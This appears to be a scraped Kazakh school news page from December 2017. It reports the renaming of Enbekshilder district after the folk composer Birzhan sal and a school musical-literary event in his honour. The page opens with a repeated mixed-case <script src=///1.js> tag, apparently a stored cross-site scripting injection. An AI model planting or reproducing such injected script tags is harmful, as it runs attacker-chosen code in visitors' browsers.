<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.12.2017

«Рухани жаңғыру» бағдарламасы аясында Ақмола облысының Еңбекшілдер ауданы Біржан сал ауданы болып қайта аталды.

  Біржан сал Қожағұлұлындай тұлғаның есімі жас ұрпақ, жас жеткіншектердің санасында қалу үшін   С.Жүнісов атындағы  №18 орта мектеп-лицейінде «Аққуға үн қосқан – Біржан сал» атты музыкалық-әдеби монтаж өтті.

Біржан – Сегізсері, Орынбай сынды өнер иелерінен тәлім алып,  Абаймен  Семейге арнайы барып кездесуі, Сара ақынмен  Талдықорған жерінде айтысуы туралы көптеген мәліметтер тыңдармандарға  айтылды.

Заманының әділетсіздігіне , зорлық- зомбылығына  наразы Біржанның үні аспандағы аққуға үн қосқаны мәлім, халық

композиторының  өлеңдері оқылып, әндері шырқалып, кино фильмінен үзінділер көрсетілді. Оқушылар  зор ықыласқа бөленді.

Ақмола облысындағы  Еңбекшілдер ауданының «Жер шоқтығы - Көкшетау» деп жырлап өткен ақиық тұлға Біржан сал атымен аталуы құтты болсын!

Просмотров: 855


Пікір қосу



Деректерді қолтаңбаға қосу